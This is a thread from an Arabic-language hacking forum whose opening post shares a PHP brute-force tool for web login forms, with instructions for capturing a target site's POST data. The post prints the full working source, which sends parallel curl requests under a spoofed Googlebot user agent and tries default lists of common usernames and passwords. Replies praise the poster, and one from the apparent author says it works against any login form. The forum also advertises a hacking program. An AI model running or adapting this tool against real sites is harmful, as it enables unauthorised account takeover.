1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
  2. الملاحظات
    عزيزي زائر تم اطلاق الموقع الرسمي لبرنامج الاختراق Spy-Note
    إستبعاد الملاحظة
حالة الموضوع:
مغلق
  1. Ubuntu
    rankrank
    Developer

    عضو منذ:
    ‏6 يناير 2013
    عدد المشاركات:
    58
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    30
    نظام التشغيل:
    Linux
    [​IMG]


    صحا فطوركم و صحا سحوركم
    سكربت يعمل بروت فورس طبعآ غني عن التعريف
    whmcs cookie bruteforcer
    صوره للسكربت


    [​IMG]


    نأتي للشرح مباشرة :


    Target


    تضع هنا رابط الموقع كامل
    في بعض الاحيان البيانات تعمل بوست لصفحة اخرى لذلك يجب و ضع الرابط الذي يذهب اليه البوست


    Post Data


    اولا نذهب الى صفحة دخول الموقع المراد عمل بروت فورس له :


    اليوزر :
    كود PHP:
    user_massacreur
    الباس:
    كود PHP:
    pass_massacreur

    الاستخراج البوست داتا استعمل اضافة فيرفوكس


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]



    ننسخ كامل عمليات البوست و الGET ان وجدت مع ملاحظة عمليات ال GET يوضع مع Target


    Marqueur positif
    هنا كل واحد و حيله يعني ما هو الاسم الموجود في اللوحة عند الدخول وليس موجود قبل الدخول
    هذا اهم جزء في السكربت لازم تكون كلمة مميزة


    MultiThreading
    السرعة : لم اضع رقم واضح انا افضل 20 و هناك عداد اضفته للتجربة
    يعني مدة البروت فورس


    الباقي وا ضح


    السورس كود :

    كود PHP:
     <?php
    /*
      coded by Massacreur || toxico-dz
      email : webservers@hotmail.fr
      Greetz :

        ||  alzher   ||   r0ckin  ||  Sql-Sniper || i-Hmx  || band3r  || Omleet-dz ||

      home : sec4ever.com

    */


    set_time_limit(0);
    if (isset (
    $_POST['target']) and isset ($_POST['data']) and isset ($_POST['users']) and isset ($_POST['passwords'])) {
      function 
    cln_arr($array) {
        return @ 
    array_filter(@ array_unique($array));
      }
      function 
    addHandle(& $curlHandle$url$post false$flw 1$timeout 30$cookies 1) {
        
    $cURL curl_init();
        
    curl_setopt($cURLCURLOPT_RETURNTRANSFER1);
        
    curl_setopt($cURLCURLOPT_URL$url);
        
    curl_setopt($cURLCURLOPT_SSL_VERIFYPEER0);
        
    curl_setopt($cURLCURLOPT_HEADER0);
        if (
    $cookies == 1) {
          
    curl_setopt($cURLCURLOPT_COOKIEFILEgetcwd() . '/cookie.txt');
          
    curl_setopt($cURLCURLOPT_COOKIEJARgetcwd() . '/cookie.txt');
        }
        
    curl_setopt($cURLCURLOPT_USERAGENT'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
        
    curl_setopt($cURLCURLOPT_FOLLOWLOCATION$flw);
        
    curl_setopt($cURLCURLOPT_TIMEOUT$timeout);
        if (
    $post) {
          
    curl_setopt($cURLCURLOPT_POST1);
          
    curl_setopt($cURLCURLOPT_POSTFIELDS$post);
        }
        
    curl_multi_add_handle($curlHandle$cURL);
        return 
    $cURL;
      }
    //execute the handle until the flag passed to function is greater then 0
      
    function ExecHandle(& $curlHandle) {
        
    $flag null;
        do {
          
    curl_multi_exec($curlHandle$flag);
    //fetch pages in parallel
        
    } while ($flag 0);
      }
      
    $url $_POST['target'];
      
    $data $_POST['data'];
      
    $mark '/' $_POST['mark'] . '/';
      
    $multithreading $_POST['multithreading'];
    //login=user_massacreur&password=pass_massacreur
      
    $users cln_arr(explode("\n"$_POST['users']));
      
    $passwords cln_arr(explode("\n"$_POST['passwords']));
      
    $data trim($data);
      for (
    $i 0; isset ($users[$i]); $i++) {
        
    $post_0[] = preg_replace('/user_massacreur/'trim($users[$i]), $data);
      }
      for (
    $i 0; isset ($post_0[$i]); $i++) {
        for (
    $h 0; isset ($passwords[$h]); $h++) {
          
    $post[] = preg_replace('/pass_massacreur/'trim($passwords[$h]), $post_0[$i]);
        }
      }
      
    $start_time time();
      for (
    $k 0; isset ($post[$k $multithreading]); $k++) {
        
    $jstart + ($k) * $multithreading;
        
    $jstop + ($k 1) * $multithreading;


        
    $curlHandle curl_multi_init();
        for (
    $i $jstart$jstop $i and isset ($post[$i]); $i++)
          
    $curl[$i] = addHandle($curlHandle$url$post[$i], 1301);
        
    ExecHandle($curlHandle);
        for (
    $i $jstart$jstop $i and isset ($post[$i]); $i++) {
          
    $text[$i] = curl_multi_getcontent($curl[$i]);
          if (
    preg_match($mark$text[$i])) {
            
    $baki= ($i 1)%count($passwords) ;  //48=3*15+3
            
    $id_user=($i-$baki1) / count($passwords);
            
    $id_pass=$baki   ;
            echo 
    '<font size="4" color="#FF0000">' . ($i 1) . ') yes  === > the user is :     <font size="4" color="#FF00FF">'.$users[$id_user].'</font>      the pass is : <font size="4" color="#FF00FF">'.$passwords[$id_pass-1].'</font><br /></font>';
          }
          else { echo (
    '<font size="4" color="#0000FF">' . ($i 1) . ') non  === > ' $post[$i] . '</font> <br />');}
        }
        for (
    $i $jstart$jstop $i and isset ($post[$i]); $i++)
    //remove the handles
          
    curl_multi_remove_handle($curlHandle$curl[$i]);
        
    curl_multi_close($curlHandle);
      }
      
    $end_time time();
      
    $duree $end_time $start_time;
      echo 
    '<center><font size="7" color="#00FF00"> N° of pass tested :'.count($post).' pass /'$duree ' sec</font></center>';

    }
    else {
      echo 
    "

      <!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN'
        'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'>
        <head>
      <title>Multithreading Brute Force Standard</title>
    </head>

    <body>

    <center><br>
            <h2>Multithreading Brute Force Standard</h2>
    <br>
    <form name='dz' method='POST' action=''>
        &nbsp;&nbsp;&nbsp;  &nbsp;&nbsp;&nbsp;&nbsp;Target&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;      : <input name='target' />     <br /><br />
       &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Post Data&nbsp;&nbsp;&nbsp;&nbsp;    : <input name='data' /> <br /><br />
     Marqueur positif : <input name='mark' value='logout' /> <br /><br />
      MultiThreading  : <input name='multithreading' value='20' /> <br /><br />
    <textarea rows='10' name='users' id='targets' cols='30'>admin
    administrateur
    login
    test
    </textarea>
    <textarea rows='10' name='passwords' cols='30'>admin
    123456
    123123
    102030
    159753
    1234567
    test
    12345678
    123456789
    </textarea><br><br>
    <input type='submit'  value='Start BruteForce' />
    </form>
    </center>
    "
    ;
    }
    ?>

    التحميل


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]



    رابط اخر


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]



    [​IMG]
     
    1 person likes this.
    جاري تحميل الصفحة...
  2. wesker Hacker
    rank
    Developer

    عضو منذ:
    ‏12 يناير 2013
    عدد المشاركات:
    47
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    نظام التشغيل:
    Linux
    رد: يعمل بروت فورس whmcs cookie bruteforcer

    بارك الله فيك يامبدع

    جاري الـ ++ و التقييم + يوشم بالخماسي + لايك

    تستاهل
    &:" ​
     
  3. Ĝυēναяα
    Developer

    عضو منذ:
    ‏21 يونيو 2012
    عدد المشاركات:
    94
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    50
    الإقامة:
    فلسطين
    رد: يعمل بروت فورس whmcs cookie bruteforcer

    [b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][size=5][color=silver][font=tahoma][b][size=2]» [/size][/b][/font][/color][/size][/size][/font][/b][/size][/font][/b][/size][/font][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][color=#419c70][font=tahoma][size=2][b]وَعّليڪُم السُلامَ ورَحَمُــۃ اللهُ وبرڪَإآتــۃ [/b][/size][/font][/color][size=5][color=silver][font=tahoma][b][size=2]»[/size][/b][/font][/color][/size][/size][/font][/b][/size][/font][/b][/size][/font]

    [font=tahoma][size=2][color=#c0c0c0][b]بارك الله فيك يامبدع[/b][/color][/size][/font][/b][/size][/font][/b][/size][/font][/b][/size][/font][/b][/size][/font][/b][/size][/font][/b][/b][/size][/font][/b][/size][/font][/b][/size][/font][/b][/size][/font][/b]
    :{1}:​
     
  4. Ubuntu
    rankrank
    Developer

    عضو منذ:
    ‏6 يناير 2013
    عدد المشاركات:
    58
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    30
    نظام التشغيل:
    Linux
    رد: يعمل بروت فورس whmcs cookie bruteforcer

    شكرا لك اخي
    وبالتوفيق&:":​
     
  5. Ubuntu
    rankrank
    Developer

    عضو منذ:
    ‏6 يناير 2013
    عدد المشاركات:
    58
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    30
    نظام التشغيل:
    Linux
    رد: يعمل بروت فورس whmcs cookie bruteforcer

    موفق اخي ​
     
  6. Stav Ak
    rank
    Developer

    عضو منذ:
    ‏18 يونيو 2013
    عدد المشاركات:
    1
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    رد: يعمل بروت فورس whmcs cookie bruteforcer

    دورک ؟
     
  7. massacreur
    rank
    Developer

    عضو منذ:
    ‏24 ابريل 2013
    عدد المشاركات:
    3
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    رد: يعمل بروت فورس whmcs cookie bruteforcer

    حبيبي
    السكربت تبعي لكن الظاهر انك خلطت بين السكربتين
    هذا السكربت يعمل brute force على اي سكربت وليس whmcs
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...